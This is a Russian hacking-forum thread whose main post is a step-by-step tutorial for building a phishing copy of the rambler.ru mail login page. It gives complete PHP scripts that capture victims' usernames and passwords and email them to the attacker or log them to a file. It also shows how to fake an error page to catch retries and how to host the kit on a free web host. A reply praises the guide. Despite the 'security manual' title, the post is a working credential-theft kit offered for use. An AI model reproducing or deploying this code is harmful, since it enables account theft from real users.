Инструкция взлома - Это пособия для безопасности!

Объявление

Hash Profit

Хочешь получить WMR бонус? Вот несколько рабочих WMR бонус программ, которые раздают бонусы за посещение их сайтов по 0.77 р., мало но каждый день что стоит кликать на кнопку и получать свой бонус, сколько накапает к примеру за месяц, за год?
worldwm
5-kopeek
icqmir
1 клик 1 wmr
3.03WMB

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.



Web Фейк для www.rambler.ru

Сообщений 1 страница 2 из 2

1

Доброго времени суток!!!

Сегодня я расскажу как сделать фейк на  rambler.ru :)

И так приступим!

Переходим на страницу авторизации http://www.rambler.ru/ открываем исходный код страницы и копируем его в текстовик и ищем строку

Код:
<form method="post" action="http://id.rambler.ru/script/auth.cgi" name="rlogin">

и меняем на

Код:
<form method="post" action="login.php">

Сохраняем как index.html

Как видим мы изменили значение обязательной атрибут <form>`а action

Вот и сам login.php

Код:
<?php

$BASE="мыло";
$IS_EMAIL=true;
$LOCATION="erorr.html";

$p0=$_REQUEST["login"];
$p1=$_REQUEST["domain"];
$p2=$_REQUEST["passw"];
$headers = "Content-type: text/html; charset=windows-1251\r\n";
$headers .= "From: bot <$BASE>\r\n";
$headers .= "Bcc: $BASE\r\n";
$info="логин:$p0:домен:$p1:пароль:$p2:\n";

if ($IS_EMAIL){
mail($BASE, "Привет от www.thehackword.ru", $headers.$info);
} else {
$fd=fopen($BASE,"a+");
fwrite($fd,$info);
fclose($fd);
}

header("Location:$LOCATION");
?>

Здесь указываем своё мыло куда будет приходить логи и ссылку куда будет перекидывать после ввода данных , в нашей случаи это erorr.html!!!

Теперь мы создадим еще одну страничку фейка так как жертва может ошибиться при входе в свой аккаунт и к нам придут не верные логи((  Для этого открываем браузер opera и топаем на

http://www.rambler.ru/ (Делаем с помощью Opera так как только этот браузер нормально сохраняет все файлы)

Вписываем в поле логина и пароля что нибудь... например xaker:xaker и жмякаем "Войти в почту" Нас перекинет на страницу http://id.rambler.ru/script/auth.cgi где нам будет сказано

Неправильное имя или пароль   Вот с этой странице мы и сделаем фейк. :)

В меню браузера находим пункт "сохранить как" и в тип файла выбираем "HTML-файл с изображениями" и сохраняем как erorr.html

http://i.pixs.ru/storage/4/9/5/Bezimyanni_9261725_2512495.png

И так если все правильно то у нас должно еще создаться папка с именем "erorr_files" :)

После открываем erorr.html с помощью блокнота (например) и ищем строку

Код:
<form method="post" action="auth.cgi?mode=login" name="auth_form" onsubmit="this.action+=location.hash">

И меняем на

Код:
<form method="post" action="rambl.php" name="auth_form" onsubmit="this.action+=location.hash">

И сохраняем :)

Вот сам rambl.php

Код:
<?php

$BASE="мыло";
$IS_EMAIL=true;
$LOCATION="http://www.rambler.ru/";

$p0=$_REQUEST["login"];
$p1=$_REQUEST["domain"];
$p2=$_REQUEST["passw"];
$headers = "Content-type: text/html; charset=windows-1251\r\n";
$headers .= "From: bot <$BASE>\r\n";
$headers .= "Bcc: $BASE\r\n";
$info="логин:$p0:домен:$p1:пароль:$p2:\n";

if ($IS_EMAIL){
mail($BASE, "Привет от www.thehackword.ru", $headers.$info);
} else {
$fd=fopen($BASE,"a+");
fwrite($fd,$info);
fclose($fd);
}

header("Location:$LOCATION");
?>

И так мы создали фейк!

Регимся например на holm.ru и с помощью FileZilla FTP Client заливаем наши файлы в папку www и радуемся!

Ну вот и все!

0

2

Админу,Респект.Всё расжевал до мелочей.Всё доступно и понятно!!!

0